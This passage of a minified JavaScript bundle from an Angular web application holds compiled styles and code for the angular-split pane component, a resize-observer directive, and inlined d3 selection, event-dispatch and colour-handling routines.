.as-split-gutter.as-split-gutter-collapsed[_ngcontent-%COMP%]{flex-basis:1px!important;pointer-events:none}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{width:100%;height:100%;background-position:center center;background-repeat:no-repeat}[_nghost-%COMP%]    >.as-split-area{flex-grow:0;flex-shrink:0;overflow-x:hidden;overflow-y:auto}[_nghost-%COMP%]    >.as-split-area.as-hidden{flex:0 1 0px!important;overflow-x:hidden;overflow-y:hidden}.as-horizontal[_nghost-%COMP%]{flex-direction:row}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:row;cursor:col-resize;height:100%}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-horizontal[_nghost-%COMP%]    >.as-split-area{height:100%}.as-vertical[_nghost-%COMP%]{flex-direction:column}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:column;cursor:row-resize;width:100%}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]   .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAFCAMAAABl/6zIAAAABlBMVEUAAADMzMzIT8AyAAAAAXRSTlMAQObYZgAAABRJREFUeAFjYGRkwIMJSeMHlBkOABP7AEGzSuPKAAAAAElFTkSuQmCC)}.as-vertical[_nghost-%COMP%]    >.as-split-area{width:100%}.as-vertical[_nghost-%COMP%]    >.as-split-area.as-hidden{max-width:0}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{cursor:default}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]   .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-transition.as-init[_nghost-%COMP%]:not(.as-dragging) > .as-split-gutter[_ngcontent-%COMP%], .as-transition.as-init[_nghost-%COMP%]:not(.as-dragging)    >.as-split-area{transition:flex-basis .3s}"],changeDetection:0}),t})(),xp=(()=>{class t{constructor(e,i,n,r){this.ngZone=e,this.elRef=i,this.renderer=n,this.split=r,this._order=null,this._size=null,this._minSize=null,this._maxSize=null,this._lockSize=!1,this._visible=!0,this.lockListeners=[],this.renderer.addClass(this.elRef.nativeElement,"as-split-area")}set order(e){this._order=Dp(e,null),this.split.updateArea(this,!0,!1)}get order(){return this._order}set size(e){this._size=Dp(e,null),this.split.updateArea(this,!1,!0)}get size(){return this._size}set minSize(e){this._minSize=Dp(e,null),this.split.updateArea(this,!1,!0)}get minSize(){return this._minSize}set maxSize(e){this._maxSize=Dp(e,null),this.split.updateArea(this,!1,!0)}get maxSize(){return this._maxSize}set lockSize(e){this._lockSize=Db(e),this.split.updateArea(this,!1,!0)}get lockSize(){return this._lockSize}set visible(e){this._visible=Db(e),this._visible?(this.split.showArea(this),this.renderer.removeClass(this.elRef.nativeElement,"as-hidden")):(this.split.hideArea(this),this.renderer.addClass(this.elRef.nativeElement,"as-hidden"))}get visible(){return this._visible}ngOnInit(){this.split.addArea(this),this.ngZone.runOutsideAngular(()=>{this.transitionListener=this.renderer.listen(this.elRef.nativeElement,"transitionend",e=>{"flex-basis"===e.propertyName&&this.split.notify("transitionEnd",-1)})})}setStyleOrder(e){this.renderer.setStyle(this.elRef.nativeElement,"order",e)}setStyleFlex(e,i,n,r,c){this.renderer.setStyle(this.elRef.nativeElement,"flex-grow",e),this.renderer.setStyle(this.elRef.nativeElement,"flex-shrink",i),this.renderer.setStyle(this.elRef.nativeElement,"flex-basis",n),!0===r?this.renderer.addClass(this.elRef.nativeElement,"as-min"):this.renderer.removeClass(this.elRef.nativeElement,"as-min"),!0===c?this.renderer.addClass(this.elRef.nativeElement,"as-max"):this.renderer.removeClass(this.elRef.nativeElement,"as-max")}lockEvents(){this.ngZone.runOutsideAngular(()=>{this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"selectstart",()=>!1)),this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"dragstart",()=>!1))})}unlockEvents(){for(;this.lockListeners.length>0;){const e=this.lockListeners.pop();e&&e()}}ngOnDestroy(){this.unlockEvents(),this.transitionListener&&this.transitionListener(),this.split.removeArea(this)}collapse(e=0,i="right"){this.split.collapseArea(this,e,i)}expand(){this.split.expandArea(this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(wr),Ee(Zh))},t.\u0275dir=Ot({type:t,selectors:[["as-split-area"],["","as-split-area",""]],inputs:{order:"order",size:"size",minSize:"minSize",maxSize:"maxSize",lockSize:"lockSize",visible:"visible"},exportAs:["asSplitArea"]}),t})(),sH=(()=>{class t{static forRoot(){return console.warn("AngularSplitModule.forRoot() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}static forChild(){return console.warn("AngularSplitModule.forChild() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class xb{constructor(a,e){this.newRect=a,this.oldRect=e,this.isFirst=null==e}}let NMe=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.resized=new Tt,this.observer=new ResizeObserver(n=>this.zone.run(()=>this.observe(n)))}ngOnInit(){this.observer.observe(this.element.nativeElement)}ngOnDestroy(){this.observer.disconnect()}observe(e){const i=e[0],n=new xb(i.contentRect,this.oldRect);this.oldRect=i.contentRect,this.resized.emit(n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","resized",""]],outputs:{resized:"resized"}}),t})(),cH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function LMe(){}function iI(t){return null==t?LMe:function(){return this.querySelector(t)}}function lH(t){return"object"==typeof t&&"length"in t?t:Array.from(t)}function WMe(){return[]}function dH(t){return null==t?WMe:function(){return this.querySelectorAll(t)}}function mH(t){return function(){return this.matches(t)}}function uH(t){return function(a){return a.matches(t)}}var BMe=Array.prototype.find;function UMe(){return this.firstElementChild}var GMe=Array.prototype.filter;function jMe(){return this.children}function hH(t){return new Array(t.length)}function NA(t,a){this.ownerDocument=t.ownerDocument,this.namespaceURI=t.namespaceURI,this._next=null,this._parent=t,this.__data__=a}function YMe(t){return function(){return t}}function JMe(t,a,e,i,n,r){for(var d,c=0,T=a.length,k=r.length;c<k;++c)(d=a[c])?(d.__data__=r[c],i[c]=d):e[c]=new NA(t,r[c]);for(;c<T;++c)(d=a[c])&&(n[c]=d)}function ZMe(t,a,e,i,n,r,c){var d,T,pe,k=new Map,q=a.length,Y=r.length,te=new Array(q);for(d=0;d<q;++d)(T=a[d])&&(te[d]=pe=c.call(T,T.__data__,d,a)+"",k.has(pe)?n[d]=T:k.set(pe,T));for(d=0;d<Y;++d)pe=c.call(t,r[d],d,r)+"",(T=k.get(pe))?(i[d]=T,T.__data__=r[d],k.delete(pe)):e[d]=new NA(t,r[d]);for(d=0;d<q;++d)(T=a[d])&&k.get(te[d])===T&&(n[d]=T)}function eve(t){return t.__data__}function sve(t,a){return t<a?-1:t>a?1:t>=a?0:NaN}NA.prototype={constructor:NA,appendChild:function(t){return this._parent.insertBefore(t,this._next)},insertBefore:function(t,a){return this._parent.insertBefore(t,a)},querySelector:function(t){return this._parent.querySelector(t)},querySelectorAll:function(t){return this._parent.querySelectorAll(t)}};var aI="http://www.w3.org/1999/xhtml";const fH={svg:"http://www.w3.org/2000/svg",xhtml:aI,xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/"};function LA(t){var a=t+="",e=a.indexOf(":");return e>=0&&"xmlns"!==(a=t.slice(0,e))&&(t=t.slice(e+1)),fH.hasOwnProperty(a)?{space:fH[a],local:t}:t}function fve(t){return function(){this.removeAttribute(t)}}function pve(t){return function(){this.removeAttributeNS(t.space,t.local)}}function _ve(t,a){return function(){this.setAttribute(t,a)}}function gve(t,a){return function(){this.setAttributeNS(t.space,t.local,a)}}function Cve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttribute(t):this.setAttribute(t,e)}}function yve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttributeNS(t.space,t.local):this.setAttributeNS(t.space,t.local,e)}}function pH(t){return t.ownerDocument&&t.ownerDocument.defaultView||t.document&&t||t.defaultView}function Mve(t){return function(){this.style.removeProperty(t)}}function vve(t,a,e){return function(){this.style.setProperty(t,a,e)}}function Ave(t,a,e){return function(){var i=a.apply(this,arguments);null==i?this.style.removeProperty(t):this.style.setProperty(t,i,e)}}function Y1(t,a){return t.style.getPropertyValue(a)||pH(t).getComputedStyle(t,null).getPropertyValue(a)}function Eve(t){return function(){delete this[t]}}function Dve(t,a){return function(){this[t]=a}}function xve(t,a){return function(){var e=a.apply(this,arguments);null==e?delete this[t]:this[t]=e}}function _H(t){return t.trim().split(/^|\s+/)}function nI(t){return t.classList||new gH(t)}function gH(t){this._node=t,this._names=_H(t.getAttribute("class")||"")}function CH(t,a){for(var e=nI(t),i=-1,n=a.length;++i<n;)e.add(a[i])}function yH(t,a){for(var e=nI(t),i=-1,n=a.length;++i<n;)e.remove(a[i])}function Ive(t){return function(){CH(this,t)}}function Rve(t){return function(){yH(this,t)}}function Sve(t,a){return function(){(a.apply(this,arguments)?CH:yH)(this,t)}}function Pve(){this.textContent=""}function Ove(t){return function(){this.textContent=t}}function Nve(t){return function(){var a=t.apply(this,arguments);this.textContent=null==a?"":a}}function zve(){this.innerHTML=""}function Wve(t){return function(){this.innerHTML=t}}function Fve(t){return function(){var a=t.apply(this,arguments);this.innerHTML=null==a?"":a}}function Bve(){this.nextSibling&&this.parentNode.appendChild(this)}function Uve(){this.previousSibling&&this.parentNode.insertBefore(this,this.parentNode.firstChild)}function Gve(t){return function(){var a=this.ownerDocument,e=this.namespaceURI;return e===aI&&a.documentElement.namespaceURI===aI?a.createElement(t):a.createElementNS(e,t)}}function jve(t){return function(){return this.ownerDocument.createElementNS(t.space,t.local)}}function bH(t){var a=LA(t);return(a.local?jve:Gve)(a)}function $ve(){return null}function Xve(){var t=this.parentNode;t&&t.removeChild(this)}function Jve(){var t=this.cloneNode(!1),a=this.parentNode;return a?a.insertBefore(t,this.nextSibling):t}function Zve(){var t=this.cloneNode(!0),a=this.parentNode;return a?a.insertBefore(t,this.nextSibling):t}function a4e(t){return t.trim().split(/^|\s+/).map(function(a){var e="",i=a.indexOf(".");return i>=0&&(e=a.slice(i+1),a=a.slice(0,i)),{type:a,name:e}})}function n4e(t){return function(){var a=this.__on;if(a){for(var r,e=0,i=-1,n=a.length;e<n;++e)r=a[e],t.type&&r.type!==t.type||r.name!==t.name?a[++i]=r:this.removeEventListener(r.type,r.listener,r.options);++i?a.length=i:delete this.__on}}}function o4e(t,a,e){return function(){var n,i=this.__on,r=function i4e(t){return function(a){t.call(this,a,this.__data__)}}(a);if(i)for(var c=0,d=i.length;c<d;++c)if((n=i[c]).type===t.type&&n.name===t.name)return this.removeEventListener(n.type,n.listener,n.options),this.addEventListener(n.type,n.listener=r,n.options=e),void(n.value=a);this.addEventListener(t.type,r,e),n={type:t.type,name:t.name,value:a,listener:r,options:e},i?i.push(n):this.__on=[n]}}function MH(t,a,e){var i=pH(t),n=i.CustomEvent;"function"==typeof n?n=new n(a,e):(n=i.document.createEvent("Event"),e?(n.initEvent(a,e.bubbles,e.cancelable),n.detail=e.detail):n.initEvent(a,!1,!1)),t.dispatchEvent(n)}function s4e(t,a){return function(){return MH(this,t,a)}}function c4e(t,a){return function(){return MH(this,t,a.apply(this,arguments))}}gH.prototype={add:function(t){this._names.indexOf(t)<0&&(this._names.push(t),this._node.setAttribute("class",this._names.join(" ")))},remove:function(t){var a=this._names.indexOf(t);a>=0&&(this._names.splice(a,1),this._node.setAttribute("class",this._names.join(" ")))},contains:function(t){return this._names.indexOf(t)>=0}};var vH=[null];function Rl(t,a){this._groups=t,this._parents=a}function AH(){return new Rl([[document.documentElement]],vH)}Rl.prototype=AH.prototype={constructor:Rl,select:function zMe(t){"function"!=typeof t&&(t=iI(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,k,r=a[n],c=r.length,d=i[n]=new Array(c),q=0;q<c;++q)(T=r[q])&&(k=t.call(T,T.__data__,q,r))&&("__data__"in T&&(k.__data__=T.__data__),d[q]=k);return new Rl(i,this._parents)},selectAll:function VMe(t){t="function"==typeof t?function FMe(t){return function(){var a=t.apply(this,arguments);return null==a?[]:lH(a)}}(t):dH(t);for(var a=this._groups,e=a.length,i=[],n=[],r=0;r<e;++r)for(var T,c=a[r],d=c.length,k=0;k<d;++k)(T=c[k])&&(i.push(t.call(T,T.__data__,k,c)),n.push(T));return new Rl(i,n)},selectChild:function qMe(t){return this.select(null==t?UMe:function HMe(t){return function(){return BMe.call(this.children,t)}}("function"==typeof t?t:uH(t)))},selectChildren:function $Me(t){return this.selectAll(null==t?jMe:function QMe(t){return function(){return GMe.call(this.children,t)}}("function"==typeof t?t:uH(t)))},filter:function KMe(t){"function"!=typeof t&&(t=mH(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,r=a[n],c=r.length,d=i[n]=[],k=0;k<c;++k)(T=r[k])&&t.call(T,T.__data__,k,r)&&d.push(T);return new Rl(i,this._parents)},data:function tve(t,a){if(!arguments.length)return Array.from(this,eve);var e=a?ZMe:JMe,i=this._parents,n=this._groups;"function"!=typeof t&&(t=YMe(t));for(var r=n.length,c=new Array(r),d=new Array(r),T=new Array(r),k=0;k<r;++k){var q=i[k],Y=n[k],te=Y.length,pe=lH(t.call(q,q&&q.__data__,k,i)),Re=pe.length,Fe=d[k]=new Array(Re),Ne=c[k]=new Array(Re),et=T[k]=new Array(te);e(q,Y,Fe,Ne,et,pe,a);for(var yt,It,ut=0,Ze=0;ut<Re;++ut)if(yt=Fe[ut]){for(ut>=Ze&&(Ze=ut+1);!(It=Ne[Ze])&&++Ze<Re;);yt._next=It||null}}return(c=new Rl(c,i))._enter=d,c._exit=T,c},enter:function XMe(){return new Rl(this._enter||this._groups.map(hH),this._parents)},exit:function ive(){return new Rl(this._exit||this._groups.map(hH),this._parents)},join:function ave(t,a,e){var i=this.enter(),n=this,r=this.exit();return i="function"==typeof t?t(i):i.append(t+""),null!=a&&(n=a(n)),null==e?r.remove():e(r),i&&n?i.merge(n).order():n},merge:function nve(t){if(!(t instanceof Rl))throw new Error("invalid merge");for(var a=this._groups,e=t._groups,i=a.length,r=Math.min(i,e.length),c=new Array(i),d=0;d<r;++d)for(var te,T=a[d],k=e[d],q=T.length,Y=c[d]=new Array(q),pe=0;pe<q;++pe)(te=T[pe]||k[pe])&&(Y[pe]=te);for(;d<i;++d)c[d]=a[d];return new Rl(c,this._parents)},selection:function m4e(){return this},order:function ove(){for(var t=this._groups,a=-1,e=t.length;++a<e;)for(var c,i=t[a],n=i.length-1,r=i[n];--n>=0;)(c=i[n])&&(r&&4^c.compareDocumentPosition(r)&&r.parentNode.insertBefore(c,r),r=c);return this},sort:function rve(t){function a(Y,te){return Y&&te?t(Y.__data__,te.__data__):!Y-!te}t||(t=sve);for(var e=this._groups,i=e.length,n=new Array(i),r=0;r<i;++r){for(var k,c=e[r],d=c.length,T=n[r]=new Array(d),q=0;q<d;++q)(k=c[q])&&(T[q]=k);T.sort(a)}return new Rl(n,this._parents).order()},call:function cve(){var t=arguments[0];return arguments[0]=this,t.apply(null,arguments),this},nodes:function lve(){return Array.from(this)},node:function dve(){for(var t=this._groups,a=0,e=t.length;a<e;++a)for(var i=t[a],n=0,r=i.length;n<r;++n){var c=i[n];if(c)return c}return null},size:function mve(){let t=0;for(const a of this)++t;return t},empty:function uve(){return!this.node()},each:function hve(t){for(var a=this._groups,e=0,i=a.length;e<i;++e)for(var d,n=a[e],r=0,c=n.length;r<c;++r)(d=n[r])&&t.call(d,d.__data__,r,n);return this},attr:function bve(t,a){var e=LA(t);if(arguments.length<2){var i=this.node();return e.local?i.getAttributeNS(e.space,e.local):i.getAttribute(e)}return this.each((null==a?e.local?pve:fve:"function"==typeof a?e.local?yve:Cve:e.local?gve:_ve)(e,a))},style:function Tve(t,a,e){return arguments.length>1?this.each((null==a?Mve:"function"==typeof a?Ave:vve)(t,a,null==e?"":e)):Y1(this.node(),t)},property:function wve(t,a){return arguments.length>1?this.each((null==a?Eve:"function"==typeof a?xve:Dve)(t,a)):this.node()[t]},classed:function kve(t,a){var e=_H(t+"");if(arguments.length<2){for(var i=nI(this.node()),n=-1,r=e.length;++n<r;)if(!i.contains(e[n]))return!1;return!0}return this.each(("function"==typeof a?Sve:a?Ive:Rve)(e,a))},text:function Lve(t){return arguments.length?this.each(null==t?Pve:("function"==typeof t?Nve:Ove)(t)):this.node().textContent},html:function Vve(t){return arguments.length?this.each(null==t?zve:("function"==typeof t?Fve:Wve)(t)):this.node().innerHTML},raise:function Hve(){return this.each(Bve)},lower:function qve(){return this.each(Uve)},append:function Qve(t){var a="function"==typeof t?t:bH(t);return this.select(function(){return this.appendChild(a.apply(this,arguments))})},insert:function Kve(t,a){var e="function"==typeof t?t:bH(t),i=null==a?$ve:"function"==typeof a?a:iI(a);return this.select(function(){return this.insertBefore(e.apply(this,arguments),i.apply(this,arguments)||null)})},remove:function Yve(){return this.each(Xve)},clone:function e4e(t){return this.select(t?Zve:Jve)},datum:function t4e(t){return arguments.length?this.property("__data__",t):this.node().__data__},on:function r4e(t,a,e){var n,c,i=a4e(t+""),r=i.length;if(!(arguments.length<2)){for(d=a?o4e:n4e,n=0;n<r;++n)this.each(d(i[n],a,e));return this}var d=this.node().__on;if(d)for(var q,T=0,k=d.length;T<k;++T)for(n=0,q=d[T];n<r;++n)if((c=i[n]).type===q.type&&c.name===q.name)return q.value},dispatch:function l4e(t,a){return this.each(("function"==typeof a?c4e:s4e)(t,a))},[Symbol.iterator]:function*d4e(){for(var t=this._groups,a=0,e=t.length;a<e;++a)for(var c,i=t[a],n=0,r=i.length;n<r;++n)(c=i[n])&&(yield c)}};const wb=AH;var u4e={value:()=>{}};function TH(){for(var i,t=0,a=arguments.length,e={};t<a;++t){if(!(i=arguments[t]+"")||i in e||/[\s.]/.test(i))throw new Error("illegal type: "+i);e[i]=[]}return new zA(e)}function zA(t){this._=t}function h4e(t,a){return t.trim().split(/^|\s+/).map(function(e){var i="",n=e.indexOf(".");if(n>=0&&(i=e.slice(n+1),e=e.slice(0,n)),e&&!a.hasOwnProperty(e))throw new Error("unknown type: "+e);return{type:e,name:i}})}function f4e(t,a){for(var n,e=0,i=t.length;e<i;++e)if((n=t[e]).name===a)return n.value}function EH(t,a,e){for(var i=0,n=t.length;i<n;++i)if(t[i].name===a){t[i]=u4e,t=t.slice(0,i).concat(t.slice(i+1));break}return null!=e&&t.push({name:a,value:e}),t}zA.prototype=TH.prototype={constructor:zA,on:function(t,a){var n,e=this._,i=h4e(t+"",e),r=-1,c=i.length;if(!(arguments.length<2)){if(null!=a&&"function"!=typeof a)throw new Error("invalid callback: "+a);for(;++r<c;)if(n=(t=i[r]).type)e[n]=EH(e[n],t.name,a);else if(null==a)for(n in e)e[n]=EH(e[n],t.name,null);return this}for(;++r<c;)if((n=(t=i[r]).type)&&(n=f4e(e[n],t.name)))return n},copy:function(){var t={},a=this._;for(var e in a)t[e]=a[e].slice();return new zA(t)},call:function(t,a){if((n=arguments.length-2)>0)for(var n,r,e=new Array(n),i=0;i<n;++i)e[i]=arguments[i+2];if(!this._.hasOwnProperty(t))throw new Error("unknown type: "+t);for(i=0,n=(r=this._[t]).length;i<n;++i)r[i].value.apply(a,e)},apply:function(t,a,e){if(!this._.hasOwnProperty(t))throw new Error("unknown type: "+t);for(var i=this._[t],n=0,r=i.length;n<r;++n)i[n].value.apply(a,e)}};const DH=TH;function rI(t,a,e){t.prototype=a.prototype=e,e.constructor=t}function xH(t,a){var e=Object.create(t.prototype);for(var i in a)e[i]=a[i];return e}function Ib(){}var WA=1/.7,J1="\\s*([+-]?\\d+)\\s*",Sb="\\s*([+-]?\\d*\\.?\\d+(?:[eE][+-]?\\d+)?)\\s*",wu="\\s*([+-]?\\d*\\.?\\d+(?:[eE][+-]?\\d+)?)%\\s*",g4e=/^#([0-9a-f]{3,8})$/,C4e=new RegExp("^rgb\\("+[J1,J1,J1]+"\\)$"),y4e=new RegExp("^rgb\\("+[wu,wu,wu]+"\\)$"),b4e=new RegExp("^rgba\\("+[J1,J1,J1,Sb]+"\\)$"),M4e=new RegExp("^rgba\\("+[wu,wu,wu,Sb]+"\\)$"),v4e=new RegExp("^hsl\\("+[Sb,wu,wu]+"\\)$"),A4e=new RegExp("^hsla\\("+[Sb,wu,wu,Sb]+"\\)$"),wH={aliceblue:15792383,antiquewhite:16444375,aqua:65535,aquamarine:8388564,azure:15794175,beige:16119260,bisque:16770244,black:0,blanchedalmond:16772045,blue:255,blueviolet:9055202,brown:10824234,burlywood:14596231,cadetblue:6266528,chartreuse:8388352,chocolate:13789470,coral:16744272,cornflowerblue:6591981,cornsilk:16775388,crimson:14423100,cyan:65535,darkblue:139,darkcyan:35723,darkgoldenrod:12092939,darkgray:11119017,darkgreen:25600,darkgrey:11119017,darkkhaki:12433259,darkmagenta:9109643,darkolivegreen:5597999,darkorange:16747520,darkorchid:10040012,darkred:9109504,darksalmon:15308410,darkseagreen:9419919,darkslateblue:4734347,darkslategray:3100495,darkslategrey:3100495,darkturquoise:52945,darkviolet:9699539,deeppink:16716947,deepskyblue:49151,dimgray:6908265,dimgrey:6908265,dodgerblue:2003199,firebrick:11674146,floralwhite:16775920,forestgreen:2263842,fuchsia:16711935,gainsboro:14474460,ghostwhite:16316671,gold:16766720,goldenrod:14329120,gray:8421504,green:32768,greenyellow:11403055,grey:8421504,honeydew:15794160,hotpink:16738740,indianred:13458524,indigo:4915330,ivory:16777200,khaki:15787660,lavender:15132410,lavenderblush:16773365,lawngreen:8190976,lemonchiffon:16775885,lightblue:11393254,lightcoral:15761536,lightcyan:14745599,lightgoldenrodyellow:16448210,lightgray:13882323,lightgreen:9498256,lightgrey:13882323,lightpink:16758465,lightsalmon:16752762,lightseagreen:2142890,lightskyblue:8900346,lightslategray:7833753,lightslategrey:7833753,lightsteelblue:11584734,lightyellow:16777184,lime:65280,limegreen:3329330,linen:16445670,magenta:16711935,maroon:8388608,mediumaquamarine:6737322,mediumblue:205,mediumorchid:12211667,mediumpurple:9662683,mediumseagreen:3978097,mediumslateblue:8087790,mediumspringgreen:64154,mediumturquoise:4772300,mediumvioletred:13047173,midnightblue:1644912,mintcream:16121850,mistyrose:16770273,moccasin:16770229,navajowhite:16768685,navy:128,oldlace:16643558,olive:8421376,olivedrab:7048739,orange:16753920,orangered:16729344,orchid:14315734,palegoldenrod:15657130,palegreen:10025880,paleturquoise:11529966,palevioletred:14381203,papayawhip:16773077,peachpuff:16767673,peru:13468991,pink:16761035,plum:14524637,powderblue:11591910,purple:8388736,rebeccapurple:6697881,red:16711680,rosybrown:12357519,royalblue:4286945,saddlebrown:9127187,salmon:16416882,sandybrown:16032864,seagreen:3050327,seashell:16774638,sienna:10506797,silver:12632256,skyblue:8900331,slateblue:6970061,slategray:7372944,slategrey:7372944,snow:16775930,springgreen:65407,steelblue:4620980,tan:13808780,teal:32896,thistle:14204888,tomato:16737095,turquoise:4251856,violet:15631086,wheat:16113331,white:16777215,whitesmoke:16119285,yellow:16776960,yellowgreen:10145074};function IH(){return this.rgb().formatHex()}function RH(){return this.rgb().formatRgb()}function xg(t){var a,e;return t=(t+"").trim().toLowerCase(),(a=g4e.exec(t))?(e=a[1].length,a=parseInt(a[1],16),6===e?SH(a):3===e?new $l(a>>8&15|a>>4&240,a>>4&15|240&a,(15&a)<<4|15&a,1):8===e?FA(a>>24&255,a>>16&255,a>>8&255,(255&a)/255):4===e?FA(a>>12&15|a>>8&240,a>>8&15|a>>4&240,a>>4&15|240&a,((15&a)<<4|15&a)/255):null):(a=C4e.exec(t))?new $l(a[1],a[2],a[3],1):(a=y4e.exec(t))?new $l(255*a[1]/100,255*a[2]/100,255*a[3]/100,1):(a=b4e.exec(t))?FA(a[1],a[2],a[3],a[4]):(a=M4e.exec(t))?FA(255*a[1]/100,255*a[2]/100,255*a[3]/100,a[4]):(a=v4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,1):(a=A4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,a[4]):wH.hasOwnProperty(t)?SH(wH[t]):"transparent"===t?new $l(NaN,NaN,NaN,0):null}function SH(t){return new $l(t>>16&255,t>>8&255,255&t,1)}function FA(t,a,e,i){return i<=0&&(t=a=e=NaN),new $l(t,a,e,i)}function E4e(t){return t instanceof Ib||(t=xg(t)),t?new $l((t=t.rgb()).r,t.g,t.b,t.opacity):new $l}function VA(t,a,e,i){return 1===arguments.length?E4e(t):new $l(t,a,e,null==i?1:i)}function $l(t,a,e,i){this.r=+t,this.g=+a,this.b=+e,this.opacity=+i}function kH(){return"#"+sI(this.r)+sI(this.g)+sI(this.b)}function PH(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"rgb(":"rgba(")+Math.max(0,Math.min(255,Math.round(this.r)||0))+", "+Math.max(0,Math.min(255,Math.round(this.g)||0))+", "+Math.max(0,Math.min(255,Math.round(this.b)||0))+(1===t?")":", "+t+")")}function sI(t){return((t=Math.max(0,Math.min(255,Math.round(t)||0)))<16?"0":"")+t.toString(16)}function OH(t,a,e,i){return i<=0?t=a=e=NaN:e<=0||e>=1?t=a=NaN:a<=0&&(t=NaN),new Iu(t,a,e,i)}function NH(t){if(t instanceof Iu)return new Iu(t.h,t.s,t.l,t.opacity);if(t instanceof Ib||(t=xg(t)),!t)return new Iu;if(t instanceof Iu)return t;var a=(t=t.rgb()).r/255,e=t.g/255,i=t.b/255,n=Math.min(a,e,i),r=Math.max(a,e,i),c=NaN,d=r-n,T=(r+n)/2;return d?(c=a===r?(e-i)/d+6*(e<i):e===r?(i-a)/d+2:(a-e)/d+4,d/=T<.5?r+n:2-r-n,c*=60):d=T>0&&T<1?0:c,new Iu(c,d,T,t.opacity)}function Iu(t,a,e,i){this.h=+t,this.s=+a,this.l=+e,this.opacity=+i}function cI(t,a,e){return 255*(t<60?a+(e-a)*t/60:t<180?e:t<240?a+(e-a)*(240-t)/60:a)}function LH(t,a,e,i,n){var r=t*t,c=r*t;return((1-3*t+3*r-c)*a+(4-6*r+3*c)*e+(1+3*t+3*r-3*c)*i+c*n)/6}rI(Ib,xg,{copy:function(t){return Object.assign(new this.constructor,this,t)},displayable:function(){return this.rgb().displayable()},hex:IH,formatHex:IH,formatHsl:function T4e(){return NH(this).formatHsl()},formatRgb:RH,toString:RH}),rI($l,VA,xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},rgb:function(){return this},displayable:function(){return-.5<=this.r&&this.r<255.5&&-.5<=this.g&&this.g<255.5&&-.5<=this.b&&this.b<255.5&&0<=this.opacity&&this.opacity<=1},hex:kH,formatHex:kH,formatRgb:PH,toString:PH})),rI(Iu,function D4e(t,a,e,i){return 1===arguments.length?NH(t):new Iu(t,a,e,null==i?1:i)},xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new Iu(this.h,this.s,this.l*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new Iu(this.h,this.s,this.l*t,this.opacity)},rgb:function(){var t=this.h%360+360*(this.h<0),a=isNaN(t)||isNaN(this.s)?0:this.s,e=this.l,i=e+(e<.5?e:1-e)*a,n=2*e-i;return new $l(cI(t>=240?t-240:t+120,n,i),cI(t,n,i),cI(t<120?t+240:t-120,n,i),this.opacity)},displayable:function(){return(0<=this.s&&this.s<=1||isNaN(this.s))&&0<=this.l&&this.l<=1&&0<=this.opacity&&this.opacity<=1},formatHsl:function(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"hsl(":"hsla(")+(this.h||0)+", "+100*(this.s||0)+"%, "+100*(this.l||0)+"%"+(1===t?")":", "+t+")")}}));const lI=t=>()=>t;function WH(t,a){var e=a-t;return e?function zH(t,a){return function(e){return t+e*a}}(t,e):lI(isNaN(t)?a:t)}const BA=function t(a){var e=function R4e(t){return 1==(t=+t)?WH:function(a,e){return e-a?function I4e(t,a,e){return t=Math.pow(t,e),a=Math.pow(a,e)-t,e=1/e,function(i){return Math.pow(t+i*a,e)}}(a,e,t):lI(isNaN(a)?e:a)}}(a);function i(n,r){var c=e((n=VA(n)).r,(r=VA(r)).r),d=e(n.g,r.g),T=e(n.b,r.b),k=WH(n.opacity,r.opacity);return function(q){return n.r=c(q),n.g=d(q),n.b=T(q),n.opacity=k(q),n+""}}return i.gamma=t,i}(1);function FH(t){return function(a){var c,d,e=a.length,i=new Array(e),n=new Array(e),r=new 